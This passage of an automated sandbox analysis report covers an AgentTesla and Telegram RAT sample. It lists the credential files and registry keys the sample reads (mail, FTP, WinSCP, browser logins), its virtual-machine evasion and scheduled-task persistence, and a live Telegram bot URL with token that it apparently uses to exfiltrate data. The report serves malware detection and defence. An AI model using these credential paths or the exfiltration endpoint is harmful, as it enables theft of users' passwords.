                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Telegram RAT
                Source: Yara matchFile source: 0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe PID: 3984, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe PID: 6956, type: MEMORYSTR
                Yara detected AgentTesla
                Source: Yara matchFile source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.3613f70.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.35dfb50.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.35dfb50.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.35a9930.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.3613f70.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000000.337227939.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000000.338699898.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000000.327062889.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.521016859.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.346406018.00000000035A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000000.338146222.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe PID: 3984, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe PID: 6956, type: MEMORYSTR
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: Yara matchFile source: 0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe PID: 6956, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Telegram RAT
                Source: Yara matchFile source: 0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe PID: 3984, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe PID: 6956, type: MEMORYSTR
                Yara detected AgentTesla
                Source: Yara matchFile source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.3613f70.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.35dfb50.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.35dfb50.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.35a9930.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.3613f70.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000000.337227939.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000000.338699898.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000000.327062889.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.521016859.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.346406018.00000000035A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000000.338146222.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe PID: 3984, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe PID: 6956, type: MEMORYSTR

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts211
                Windows Management Instrumentation                		1
                Scheduled Task/Job                		111
                Process Injection                		11
                Disable or Modify Tools                		2
                OS Credential Dumping                		1
                File and Directory Discovery                		Remote Services11
                Archive Collected Data                		Exfiltration Over Other Network Medium1
                Web Service                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts1
                Scheduled Task/Job                		Boot or Logon Initialization Scripts1
                Scheduled Task/Job                		1
                Deobfuscate/Decode Files or Information                		11
                Input Capture                		114
                System Information Discovery                		Remote Desktop Protocol2
                Data from Local System                		Exfiltration Over Bluetooth11
                Encrypted Channel                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)2
                Obfuscated Files or Information                		1
                Credentials in Registry                		1
                Query Registry                		SMB/Windows Admin Shares1
                Email Collection                		Automated Exfiltration2
                Non-Application Layer Protocol                		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)13
                Software Packing                		NTDS311
                Security Software Discovery                		Distributed Component Object Model11
                Input Capture                		Scheduled Transfer3
                Application Layer Protocol                		SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Masquerading                		LSA Secrets1
                Process Discovery                		SSH1
                Clipboard Data                		Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common131
                Virtualization/Sandbox Evasion                		Cached Domain Credentials131
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items111
                Process Injection                		DCSync1
                Application Window Discovery                		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                Remote System Discovery                		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 635380 Sample: SecuriteInfo.com.W32.AIDete... Startdate: 27/05/2022 Architecture: WINDOWS Score: 100 29 Found malware configuration 2->29 31 Malicious sample detected (through community Yara rule) 2->31 33 Multi AV Scanner detection for dropped file 2->33 35 7 other signatures 2->35 7 SecuriteInfo.com.W32.AIDetectNet.01.20229.exe 7 2->7         started        process3 file4 23 C:\Users\user\AppData\Roaming\HksvOcmoc.exe, PE32 7->23 dropped 25 C:\Users\user\AppData\Local\...\tmpCB43.tmp, XML 7->25 dropped 37 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 7->37 39 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 7->39 41 Uses schtasks.exe or at.exe to add and modify task schedules 7->41 43 2 other signatures 7->43 11 SecuriteInfo.com.W32.AIDetectNet.01.20229.exe 15 2 7->11         started        15 powershell.exe 25 7->15         started        17 schtasks.exe 1 7->17         started        signatures5 process6 dnsIp7 27 api.telegram.org 149.154.167.220, 443, 49764 TELEGRAMRU United Kingdom 11->27 45 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->45 47 Tries to steal Mail credentials (via file / registry access) 11->47 49 Tries to harvest and steal ftp login credentials 11->49 51 2 other signatures 11->51 19 conhost.exe 15->19         started        21 conhost.exe 17->21         started        signatures8 process9

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                No Antivirus matches

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\HksvOcmoc.exe30%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.6.unpack100%AviraTR/Spy.Gen8Download File
                15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.10.unpack100%AviraTR/Spy.Gen8Download File
                15.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.8.unpack100%AviraTR/Spy.Gen8Download File
                15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.12.unpack100%AviraTR/Spy.Gen8Download File
                15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
                http://uyaXTK.com0%Avira URL Cloudsafe
                http://www.tiro.com0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                https://VmuKuqO5f5glxfhci.org(t0%Avira URL Cloudsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                https://api.telegram.org40%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe
                https://VmuKuqO5f5glxfhci.org0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                api.telegram.org
                		149.154.167.220
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://api.telegram.org/bot5279079600:AAH3TUQchNyBBlwuTxWo12fRiywroON6BJo/sendDocumentfalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://127.0.0.1:HTTP/1.1SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		low
                    http://www.apache.org/licenses/LICENSE-2.0SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.fontbureau.comSecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.fontbureau.com/designersGSecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.fontbureau.com/designers/?SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.founder.com.cn/cn/bTheSecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://api.telegram.orgSecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.528098222.00000000032CF000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.fontbureau.com/designers?SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwSecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://uyaXTK.comSecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.tiro.comSecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designersSecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.goodfont.co.krSecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://VmuKuqO5f5glxfhci.org(tSecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		low
                                  https://api.telegram.org/bot5279079600:AAH3TUQchNyBBlwuTxWo12fRiywroON6BJo/SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.346406018.00000000035A1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000000.337227939.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000000.327062889.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.carterandcone.comlSecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.sajatypeworks.comSecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.typography.netDSecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/cabarga.htmlNSecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.founder.com.cn/cn/cTheSecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.galapagosdesign.com/staff/dennis.htmSecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://fontfabrik.comSecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.founder.com.cn/cnSecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://api.telegram.org4SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.528098222.00000000032CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers/frere-user.htmlSecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://api.telegram.org/bot5279079600:AAH3TUQchNyBBlwuTxWo12fRiywroON6BJo/sendDocumentdocument-----SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.jiyu-kobo.co.jp/SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://DynDns.comDynDNSnamejidpasswordPsi/PsiSecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.galapagosdesign.com/DPleaseSecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designers8SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.fonts.comSecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.sandoll.co.krSecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.urwpp.deDPleaseSecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.zhongyicts.com.cnSecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://api.telegram.orgSecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.528150791.00000000032E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.346224005.0000000002864000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.344442888.000000000260D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.528098222.00000000032CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.sakkal.comSecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.351048067.0000000006902000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://VmuKuqO5f5glxfhci.orgSecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.528068312.00000000032C9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000003.379771521.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.527999593.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  149.154.167.220
                                                  		api.telegram.orgUnited Kingdom
                                                  		62041TELEGRAMRUfalse

                                                  General Information

                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                  Analysis ID:635380
                                                  Start date and time: 27/05/202220:48:282022-05-27 20:48:28 +02:00
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 10m 13s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Sample file name:SecuriteInfo.com.W32.AIDetectNet.01.20229.6203 (renamed file extension from 6203 to exe)
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                  Number of analysed new started processes analysed:27
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
